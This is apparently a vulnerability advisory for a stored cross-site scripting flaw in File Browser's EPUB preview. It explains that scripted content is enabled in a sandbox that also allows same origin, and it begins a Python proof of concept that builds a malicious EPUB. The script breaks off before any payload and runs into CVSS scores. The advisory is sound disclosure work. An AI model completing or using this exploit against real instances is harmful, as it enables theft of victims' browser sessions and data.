The EPUB preview function in File Browser is vulnerable to Stored Cross-site Scripting (XSS). JavaScript embedded in a crafted EPUB file executes in the victim's browser when they preview the file.
frontend/src/views/files/Preview.vue passes allowScriptedContent: true to the vue-reader (epub.js) component:
// frontend/src/views/files/Preview.vue (Line 87)
:epubOptions="{
allowPopups: true,
allowScriptedContent: true,
}"
epub.js renders EPUB content inside a sandboxed <iframe> with srcdoc. However, the sandbox includes both allow-scripts and allow-same-origin, which renders the sandbox ineffective — the script can access the parent frame's DOM and storage.
The epub.js developers explicitly warn against enabling scripted content.
I've crafted the PoC python script that could be ran on test environment using docker compose:
services:
filebrowser:
image: filebrowser/filebrowser:v2.62.1
user: 0:0
ports:
- "80:80"
And running this PoC python script:
import argparse
import io
import sys
import zipfile
import requests
BANNER = """
Stored XSS via EPUB PoC
Affected: filebrowser/filebrowser <=v2.62.1
Root cause: Preview.vue -> epubOptions: { allowScriptedContent: true }
Related: CVE-2024-35236 (same pattern in audiobookshelf)
"""
CONTAINER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<container version="1.0" xmlns="urn:oasis:names:tc:opendocument:xmlns:container">
<rootfiles>
<rootfile full-path="OEBPS/content.opf" media-type="application/oebps-package+xml"/>
</rootfiles>
</container>"""
CONTENT_OPF = """<?xml version="1.0" encoding="UTF-8"?>
<package xmlns="http://www.idpf.org/2007/opf" unique-identifier="uid" version="3.0">
<metadata...
2.62.2Exploitability
AV:NAC:LPR:LUI:RScope
S:CImpact
C:HI:LA:N7.6/CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N